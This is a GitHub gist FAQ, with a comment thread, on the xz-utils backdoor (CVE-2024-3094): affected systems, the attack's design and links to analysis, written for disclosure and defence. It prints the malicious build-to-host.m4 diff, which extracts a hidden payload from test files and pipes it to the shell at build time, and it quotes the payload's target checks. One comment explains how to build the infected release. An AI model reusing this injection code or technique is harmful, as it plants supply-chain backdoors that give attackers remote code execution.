Skip to content

Instantly share code, notes, and snippets.

@thesamesam
Last active January 2, 2025 15:08
Show Gist options
  • Save thesamesam/223949d5a074ebc3dce9ee78baad9e27 to your computer and use it in GitHub Desktop.
Save thesamesam/223949d5a074ebc3dce9ee78baad9e27 to your computer and use it in GitHub Desktop.
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that gives developers lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed, statistically your average Linux or macOS system will have it installed for convenience.

This backdoor is very indirect and only shows up when a few known specific criteria are met. Others may be yet discovered! However, this backdoor is at least triggerable by remote unprivileged systems connecting to public SSH ports. This has been seen in the wild where it gets activated by connections - resulting in performance issues, but we do not know yet what is required to bypass authentication (etc) with it.

We're reasonably sure the following things need to be true for your system to be vulnerable:

  • You need to be running a distro that uses glibc (for IFUNC)
  • You need to have versions 5.6.0 or 5.6.1 of xz or liblzma installed (xz-utils provides the library liblzma) - likely only true if running a rolling-release distro and updating religiously.

We know that the combination of systemd and patched openssh are vulnerable but pending further analysis of the payload, we cannot be certain that other configurations aren't.

While not scaremongering, it is important to be clear that at this stage, we got lucky, and there may well be other effects of the infected liblzma.

If you're running a publicly accessible sshd, then you are - as a rule of thumb for those not wanting to read the rest here - likely vulnerable.

If you aren't, it is unknown for now, but you should update as quickly as possible because investigations are continuing.

TL:DR:

  • Using a .deb or .rpm based distro with glibc and xz-5.6.0 or xz-5.6.1:
    • Using systemd on publicly accessible ssh: update RIGHT NOW NOW NOW
    • Otherwise: update RIGHT NOW NOW but prioritize the former
  • Using another type of distribution:
    • With glibc and xz-5.6.0 or xz-5.6.1: update RIGHT NOW, but prioritize the above.

If all of these are the case, please update your systems to mitigate this threat. For more information about affected systems and how to update, please see this article or check the xz-utils page on Repology.

This is not a fault of sshd, systemd, or glibc, that is just how it was made exploitable.

Design

This backdoor has several components. At a high level:

  • The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.
  • There are crafted test files in the tests/ folder within the git repository too. These files are in the following commits:
  • Note that the bad commits have since been reverted in e93e13c8b3bec925c56e0c0b675d8000a0f7f754
  • A script called by build-to-host.m4 that unpacks this malicious test data and uses it to modify the build process.
  • IFUNC, a mechanism in glibc that allows for indirect function calls, is used to perform runtime hooking/redirection of OpenSSH's authentication routines. IFUNC is a tool that is normally used for legitimate things, but in this case it is exploited for this attack path.

Normally upstream publishes release tarballs that are different than the automatically generated ones in GitHub. In these modified tarballs, a malicious version of build-to-host.m4 is included to execute a script during the build process.

This script (at least in versions 5.6.0 and 5.6.1) checks for various conditions like the architecture of the machine. Here is a snippet of the malicious script that gets unpacked by build-to-host.m4 and an explanation of what it does:

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

  • If amd64/x86_64 is the target of the build
  • And if the target uses the name linux-gnu (mostly checks for the use of glibc)

It also checks for the toolchain being used:

  if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
  exit 0
  fi
  if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
  exit 0
  fi
  LDv=$LD" -v"
  if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
  exit 0

And if you are trying to build a Debian or Red Hat package:

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

This attack thusly seems to be targeted at amd64 systems running glibc using either Debian or Red Hat derived distributions. Other systems may be vulnerable at this time, but we don't know.

Lasse Collin, the original long-standing xz maintainer, is currently working on auditing the xz.git.

Design specifics

$ git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4
diff --git a/m4/build-to-host.m4 b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
index f928e9ab..d5ec3153 100644
--- a/m4/build-to-host.m4
+++ b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 3
+# build-to-host.m4 serial 30
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
 
   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
+  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
   if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
     [$1]_c_make='\"$([$1])\"'
   fi
+  if test "x$gl_am_configmake" != "x"; then
+    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+  else
+    gl_[$1]_config=''
+  fi
+  _LT_TAGDECL([], [gl_path_map], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
+
+  dnl If the host conversion code has been placed in $gl_config_gt,
+  dnl instead of duplicating it all over again into config.status,
+  dnl then we will have config.status run $gl_config_gt later, so it
+  dnl needs to know what name is stored there:
+  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
 ])
 
 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
+  dnl Search for Automake-defined pkg* macros, in the order
+  dnl listed in the Automake 1.10a+ documentation.
+  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+  if test -n "$gl_am_configmake"; then
+    HAVE_PKG_CONFIGMAKE=1
+  else
+    HAVE_PKG_CONFIGMAKE=0
+  fi
+
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
+  gl_path_map='tr "\t \-_" " \t_\-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
 changequote([,])dnl

Payload

If those conditions check, the payload is injected into the source tree. We have not analyzed this payload in detail. Here are the main things we know:

  • The payload activates if the running program has the process name /usr/sbin/sshd. Systems that put sshd in /usr/bin or another folder may or may not be vulnerable.

  • It may activate in other scenarios too, possibly even unrelated to ssh.

  • We don't entirely know the payload is intended to do. We are investigating.

  • Successful exploitation does not generate any log entries.

  • Vanilla upstream OpenSSH isn't affected unless one of its dependencies links liblzma.

    • Lennart Poettering had mentioned that it may happen via pam->libselinux->liblzma, and possibly in other cases too, but...
    • libselinux does not link to liblzma. It turns out the confusion was because of an old downstream-only patch in Fedora and a stale dependency in the RPM spec which persisted long-beyond its removal.
    • PAM modules are loaded too late in the process AFAIK for this to work (another possible example was pam_fprintd). Solar Designer raised this issue as well on oss-security.
  • The payload is loaded into sshd indirectly. sshd is often patched to support systemd-notify so that other services can start when sshd is running. liblzma is loaded because it's depended on by other parts of libsystemd. This is not the fault of systemd, this is more unfortunate. The patch that most distributions use is available here: openssh/openssh-portable#375.

    • Update: The OpenSSH developers have added non-library integration of the systemd-notify protocol so distributions won't be patching it in via libsystemd support anymore. This change has been committed and will land in OpenSSH-9.8, due around June/July 2024.
  • If this payload is loaded in openssh sshd, the RSA_public_decrypt function will be redirected into a malicious implementation. We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why.

    • Filippo Valsorda has shared analysis indicating that the attacker must supply a key which is verified by the payload and then attacker input is passed to system(), giving remote code execution (RCE).

Tangential xz bits

  • Jia Tan's 328c52da8a2bbb81307644efdb58db2c422d9ba7 commit contained a . in the CMake check for landlock sandboxing support. This caused the check to always fail so landlock support was detected as absent.

    • Hardening of CMake's check_c_source_compiles has been proposed (see Other projects).
  • IFUNC was introduced for crc64 in ee44863ae88e377a5df10db007ba9bfadde3d314 by Hans Jansen.

    • Hans Jansen later went on to ask Debian to update xz-utils in https://bugs.debian.org/1067708, but this is quite a common thing for eager users to do, so it's not necessarily nefarious.

People

We do not want to speculate on the people behind this project in this document. This is not a productive use of our time, and law enforcement will be able to handle identifying those responsible. They are likely patching their systems too.

xz-utils had two maintainers:

  • Lasse Collin (Larhzu) who has maintained xz since the beginning (~2009), and before that, lzma-utils.
  • Jia Tan (JiaT75) who started contributing to xz in the last 2-2.5 years and gained commit access, and then release manager rights, about 1.5 years ago. He was removed on 2024-03-31 as Lasse begins his long work ahead.

Lasse regularly has internet breaks and was on one of these as this all kicked off. He has posted an update at https://tukaani.org/xz-backdoor/ and is working with the community.

Please be patient with him as he gets up to speed and takes time to analyse the situation carefully.

Misc notes

Analysis of the payload

This is the part which is very much in flux. It's early days yet.

These two especially do a great job of analysing the initial/bash stages:

Other great resources:

Other projects

There are concerns some other projects are affected (either by themselves or changes to other projects were made to facilitate the xz backdoor). I want to avoid a witch-hunt but listing some examples here which are already been linked widely to give some commentary.

Tangential efforts as a result of this incident

This is for suggesting specific changes which are being considered as a result of this.

Discussions in the wake of this

This is for linking to interesting general discussions, rather than specific changes being suggested (see above).

Non-mailing list proposals:

Acknowledgements

  • Andres Freund who discovered the issue and reported it to linux-distros and then oss-security.
  • All the hard-working security teams helping to coordinate a response and push out fixes.
  • Xe Iaso who resummarized this page for readability.
  • Everybody who has provided me tips privately, in #tukaani, or in comments on this gist.

Meta

Please try to keep comments on the gist constrained to editorial changes I need to make, new sources, etc.

There are various places to theorise & such, please see e.g. https://discord.gg/TPz7gBEE (for both, reverse engineering and OSint). (I'm not associated with that Discord but the link is going around, so...)

Response to questions

  • A few people have asked why Jia Tan followed me (@thesamesam) on GitHub. #tukaani was a small community on IRC before this kicked off (~10 people, currently has ~350). I've been in #tukaani for a few years now. When the move from self-hosted infra to github was being planned and implemented, I was around and starred & followed the new Tukaani org pretty quickly.

  • I'm referenced in one of the commits in the original oss-security post that works around noise from the IFUNC resolver. This was a legitimate issue which applies to IFUNC resolvers in general. The GCC bug it led to (PR114115) has been fixed.

    • On reflection, there may have been a missed opportunity as maybe I should have looked into why I couldn't hit the reported Valgrind problems from Fedora on Gentoo, but this isn't the place for my own reflections nor is it IMO the time yet.

TODO for this doc

  • Add a table of releases + signer?
  • Include the injection script after the macro
  • Mention detection?
  • Explain the bug-autoconf thing maybe wrt serial
  • Explain dist tarballs, why we use them, what they do, link to autotools docs, etc
    • "Explaining the history of it would be very helpful I think. It also explains how a single person was able to insert code in an open source project that no one was able to peer review. It is pragmatically impossible, even if technically possible once you know the problem is there, to peer review a tarball prepared in this manner."

TODO overall

Anyone can and should work on these. I'm just listing them so people have a rough idea of what's left.

  • Ensuring Lasse Collin and xz-utils is supported, even long after the fervour is over
  • Reverse engineering the payload (it's still fairly early days here on this)
    • Once finished, tell people whether:
      • the backdoor did anything else than waiting for connections for RCE, like:
        • call home (send found private keys, etc)
        • load/execute additional rogue code
        • did some other steps to infest the system (like adding users, authorized_keys, etc.) or whether it can be certainly said, that it didn't do so
      • other attack vectors than via sshd were possible
      • whether people (who had the compromised versions) can feel fully safe if they either had sshd not running OR at least not publicly accessible (e.g. because it was behind a firewall, nat, iptables, etc.)
  • Auditing all possibly-tainted xz-utils commits
  • Investigate other paths for sshd to get liblzma in its process (not just via libsystemd, or at least not directly)
    • This is already partly done and it looks like none exist, but it would be nice to be sure.
  • Checking other projects for similar injection mechanisms (e.g. similar build system lines)
  • Diff and review all "golden" upstream tarballs used by distros against the output of creating a tarball from the git tag for all packages.
  • Check other projecs which (recently) introduced IFUNC, as suggested by thegrugq.
    • This isn't a bad idea even outside of potential backdoors, given how brittle IFUNC is.
  • ???

References and other reading material

@AN4364364
Copy link

replying to the large image posted depicting the "Jia Cheong Tan" name

I found a couple open source software copyright notes that include that name that were indexed by search engines, indicating their code (libarchive contributions) made it into some products.

https://www.tcsag.de/fileadmin/user_upload/Information_Open-Source-Software_PES_Pro_IP.pdf
https://amazon-source-code-downloads.s3.amazonaws.com/eero/eero-embedded/eero-oss-attribution-latest.txt

With zero commentary on the true ethnic background of the bad actor, as I don't think that's their real name, I think "Jia Cheong Tan" and "Jia Tan" are useful search terms. Only because they had to have reused it when operating this persona.

@cre0z
Copy link

cre0z commented Mar 30, 2024

As usual the actor will reveal itself by being most vocal about being innocent.

I personally doubt this would happen given the backdoor appears to be very sophisticated and has taken a lot of time to implement. Thus I can assume that the malicious actor is smart enough to not talk very much.

@snnn
Copy link

snnn commented Mar 30, 2024

I makes me think of one thing: if you ever heard of BinSkim and you add it to your build pipelines, then if anyone ever tried to insert a binary *.o file into your build like this, at least the malicious file needs be compiled with required security flags to prevent common attacks. It's better than doing nothing.

Also, no Linux distro ever run any static code analysis when building their packages. Never. Think how would be possible to insert clang-analyzer or CodeQL into rpm-build. And even if you do, nobody has enough time to address all the false positives.

On Windows we can use ApiValidator tool and a whitelist txt file to validate if all the Windows APIs the binary uses are in the whitelist. By doing this we can add a safety check in our build pipelines to warn us if a new API call was added. For example, if anyone ever tried to use CreateRemoteThread to create injections to another process, at least we could know that. However, it cannot handle indirect calls. Maybe some kind of static analysis could help us generate a list of parameters of all the GetProcAddress calls.

If your build environment is not in an isolated network, an attacker can host their payload in a public cloud storage(like Github) then download it during a build, which makes it hard to trace. For example, Python's manylinux docker images. Even you have verified the crypto checksums when downloading open source software's source code(like libxcrypt), it doesn't prevent them downloading more data during the build.

@arizvisa
Copy link

@NuLL3rr0r: ftr, there's also the [email protected] email account from the git logs, even mentioned by the OP, (which "sleuths" seem to have skipped over) that also has a corresponding GH account... but yeah, only internet stalkers care about that crap.

@waterkip
Copy link

Is there any updates research on the matter yet?

I recommend keeping an eye open here: https://openwall.com/lists/oss-security/2024/03/

@waterkip
Copy link

@NuLL3rr0r: ftr, there's also the [email protected] email account from the git logs, even mentioned by the OP, (which "sleuths" seem to have skipped over) that also has a corresponding GH account... but yeah, only internet stalkers care about that crap.

I mailmapped the repo yesterday, these are the units they have committed with:

Jia Cheong Tan <[email protected]> Jia Tan <[email protected]>
Jia Cheong Tan <[email protected]> Jia Tan <[email protected]>
Jia Cheong Tan <[email protected]> jiat75 <[email protected]>

@MagpieRYL
Copy link

I want to do some analyzing with the samples which I lack yet, like the polluted "sshd" binary or .so files.
Can any guys offer one if you have it? APPRECIATE SO MUCH !

@DanielRuf
Copy link

@arizvisa https://github.com/jiat75 is the "real" account, which commited all the time to xz.

You just don't see the PRs and commits there anymore, because the xz repo was disabled by GitHub.

@evokelektrique
Copy link

Damn

@NuLL3rr0r
Copy link

@snnn thanks for introducing BinSkim! I did not know about that.

I personally do agree with @arizvisa let's stop accusing people with similar names or from a certain country since I as well highly doubt those identities are real identities and the malicious actor is smart enough to still someone else's identity.

@NuLL3rr0r
Copy link

NuLL3rr0r commented Mar 30, 2024

@MagpieRYL you could install a Gentoo instance as I see they still have the ebuilds for 5.6.1 and the infected source archive on their mirrors, but masked it so no one can install it by mistake. But, you can unmask it deliberately and build it from source.

@gh-nate
Copy link

gh-nate commented Mar 30, 2024

I'm watching some folks reverse engineer the xz backdoor, sharing some preliminary analysis with permission.

The hooked RSA_public_decrypt verifies a signature on the server's host key by a fixed Ed448 key, and then passes a payload to system().

It's RCE, not auth bypass, and gated/unreplayable. — https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b

Multiple posts in a thread including ...

Apparently the backdoor reverts back to regular operation if the payload is malformed or the signature from the attacker's key doesn't verify.

Unfortunately, this means that unless a bug is found, we can't write a reliable/reusable over-the-network scanner. — https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowkezwz6g2q

@christoofar
Copy link

How many Docker/LXC images that pulled bleeding somehow managed to incorporate this in the last month, I wonder, because the tarball was pulled. Have already seen Go programmers that use use CGo raise eyebrows because they often take the shortcut to build from a tarball to make the whole build easier.

@smallxu038
Copy link

This command can check whether Docker containers are running the affected version of xz.

docker ps -aq | xargs -I {} docker exec {} sh -c 'xz --version || echo "xz not found"' 2>/dev/null

Clearly, this incident has deepened prejudice and discrimination against Chinese people. I would rather believe that it is a pseudonym for an organization, not a real person :(

@DanielRuf
Copy link

@smallxu038 the origin of the person doesn't matter. And only fools think that it is connected to a specific country.

Even with the version you need more things (see the requirements from the Gist) to be exploitable.

Some people seem to make progress with reverse engineering the payload. Currently there is the assumption that the backdoor allows Remote Code Execution (RCE). See https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b for more details.

@wryMitts
Copy link

wryMitts commented Mar 30, 2024

Windows 11 may be in scope.

Libarchive reviewing Jia Tan commits starting from 2021:
libarchive/libarchive#2103
Windows 11 added Libarchive in 23h2 (released in late 2023/early 2024):
https://support.microsoft.com/en-us/topic/november-14-2023-kb5032190-os-builds-22621-2715-and-22631-2715-f9e3e13c-5e98-42c2-add8-f075841ca812

New! This update adds native support for reading additional archive file formats using the libarchive open-source project, such as:
...
tar.xz
...

The given DLL and support to open tar.xz is observed in earlier versions of Windows 11 including Windows 22H2.

@NuLL3rr0r
Copy link

Windows 11 may be in scope.

Libarchive reviewing Jia Tan commits starting from 2021: libarchive/libarchive#2103 Windows 11 added Libarchive in 23h2 (released in late 2023/early 2024): https://support.microsoft.com/en-us/topic/november-14-2023-kb5032190-os-builds-22621-2715-and-22631-2715-f9e3e13c-5e98-42c2-add8-f075841ca812

New! This update adds native support for reading additional archive file formats using the libarchive open-source project, such as:
...
tar.xz
...

That would make billions of devices vulnerable!! 🤯

@smallxu038
Copy link

@smallxu038 the origin of the person doesn't matter. And only fools think that it is connected to a specific country.

Even with the version you need more things (see the requirements from the Gist) to be exploitable.

Some people seem to make progress with reverse engineering the payload. Currently there is the assumption that the backdoor allows Remote Code Execution (RCE). See https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b for more details.

Yes, what we need to consider now is how to solve security issues and how to prevent such situations from happening again, rather than attacking people from a certain region. Rational people still make up the majority. This attacker is just one step away from causing greater damage, I am still paying attention to this event, thank you for providing the information.

@DanielRuf
Copy link

@NuLL3rr0r there is probably no backdoor. Otherwise we would know more.

I would not jump to conclusions here and assume that every touched project has this backdoor. Currently it's about xz version 5.6.0 and 5.6.1.

Other projects and commits have to be checked before anyone can say for sure, if other projects also have malicious code.

@spawel22
Copy link

@NuLL3rr0r there is probably no backdoor. Otherwise we would know more.

You need to check it first. Wild guessing means nothing.

@DanielRuf
Copy link

@spawel22 that's what "probably" implies. And my last sentence:

Other projects and commits have to be checked before anyone can say for sure, if other projects also have malicious code.

Check / verify first, post facts afterwards.

@wryMitts
Copy link

wryMitts commented Mar 30, 2024

Windows 11 22H2 22621.3007 may contain Jia Tan code. See below.
Windows 11 23H2 may contain more.. not tested yet,

Windows 10 22h2

Windows 10 22H2 19045.4170 has libarchive dll, but may be too old, before Jia Tan added commits:
C:\Windows\WinSxS\amd64_libarchive-internal ... (need to add in your UUID in path if different)
Or C:\Windows\System32\archiveint.dll
Version 3.5.1.0

Oldest Jia Tan commit to libarchive is 2021, but none of those commits are in 3.5.1
libarchive/libarchive@v3.5.0...v3.5.1
3.5.0 released in 2020. Only small bugfixes, nothing from Jia since then.
image

Windows 11 22h2

Commits from Jia Tan present!! libarchive/libarchive@v3.5.1...v3.6.2
Code is in use to open tar.xz archives! See link
Windows 11 22H2 22621.3007 contains libarchive 3.6.2.0:
image

Contains proper strings to match dll version to github version as a sanity check

user$strings archiveint.dll | grep libarchive
libarchive 3.6.2

Xz support compiled in by Microsoft:

$ strings archiveint.dll | grep xz
Can't allocate data for xz decompression
xz initialization failed(%d)
No memory for xz decompression
Truncated xz file body
xz data error (error %d)
xz unknown error %d
xz premature end of stream
archive_write_add_filter_xz
.tar.xz
archive_read_support_compression_xz
archive_read_support_filter_xz
archive_write_add_filter_xz
archive_write_set_compression_xz

Windows 11 23h2

No data available yet, come back later?

@chenrui333
Copy link

it might be good to also callout this oss-fuzz pr, google/oss-fuzz#10667

@thesamesam
Copy link
Author

I'm going to mention the oss-fuzz & libarchive because a lot of people keep asking about it but with some commentary next to it. Just going to eat first.

@wryMitts
Copy link

wryMitts commented Mar 30, 2024

Windows 11 using Jia Tan xz code from libarchive

Initial info

In addition to this info

Windows 11 22H2 22621.3007 support for xz files
image

Windows 11 explorer.exe loads archiveint.dll only AFTER opening any .xz archive

image

@cculianu
Copy link

I just don't want anyone here to say something like "A Chinese/Asian name! These bad Chinese/Asian hackers!!".

That's wrong. It is very very likely that Jia Tan is just a fake identity. We cannot decide the one/ones behind Jia Tan.

Agreed. In fact it's likely the guy isn't Chinese at all and that is 100% misdirection.

@cyclone-github
Copy link

Simple script to detect if your linux distro is vulnerable to CVE-2024-3094
https://github.com/cyclone-github/scripts/blob/main/xz_cve-2024-3094-detect.sh
(This is a fixed and features added version of https://www.openwall.com/lists/oss-security/2024/03/29/4)

@FlyingFathead
Copy link

FlyingFathead commented Mar 30, 2024

How can we prevent this from happening again in the future?

I'm not sure if this would work in practice, but perhaps there should be an automatic A/B / diff check for the tarball contents against the repository's contents and at least a warning flag alongside the package if the contents between the two aren't matching within a stated version number. It could give some early warning on something being off with the tarball.

Then again, if it's just a warning, most people would probably just ignore it anyway, and that approach might either not cover all scenarios, or make certain aspects over-complex. That being said, if tarball files can contain arbitrary contents that do not match the associated commit or tag in the repository, the discrepancy could be exploited maliciously for users relying on the integrity of those releases. There's a general security aspect to this that might have to be enforced from GitHub's end in the future.

The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.

... Which again made the exploit possible to begin with, and serves a reminder on how convenience tends to lead to lapses in security, and how the overall approach to that might need some serious re-evaluation, especially after major incidents like these.

Just my thoughts on this whole thing, feel free to chime in and/or correct me if I'm wrong.

@thesamesam
Copy link
Author

I have my own thoughts about post-mortem but I plan on writing that up when we're out of the storm. Not that people need to wait on me, ofc. Just think: a) still in the heat of it; b) it's too soon to reflect properly and in a clear-headed way yet.

@cw-alexcroteau
Copy link

cw-alexcroteau commented Mar 30, 2024

@thesamesam "We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why."

Based on the latest information, it looks like an RCE (sending the payload to system() rather than bypassing the auth mechanism, after verifying the key) rather than an auth bypass, while I didn't confirm it myself: https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b

The sad thing is it would not be possible to scan if over network because an invalid key or malformed request makes the code fall back to regular operation.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment